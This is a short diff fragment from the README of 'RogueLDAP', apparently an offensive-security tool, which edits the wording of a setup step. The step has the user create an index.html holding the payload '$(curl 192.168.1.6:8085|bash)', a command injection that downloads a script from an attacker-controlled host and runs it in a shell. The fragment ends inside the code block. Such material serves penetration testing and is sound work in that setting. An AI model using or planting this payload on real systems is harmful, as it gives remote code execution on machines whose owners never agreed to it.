twelvesec/RogueLDAP/README.md

 touch index.html
 ```

-Inside the ```index.html``` file put the following payload and change the IP address to the one that suits to the current environment
+Inside the ```index.html``` file put the following payload and change the IP address to the one that suits to your environment

 ```
 $(curl 192.168.1.6:8085|bash)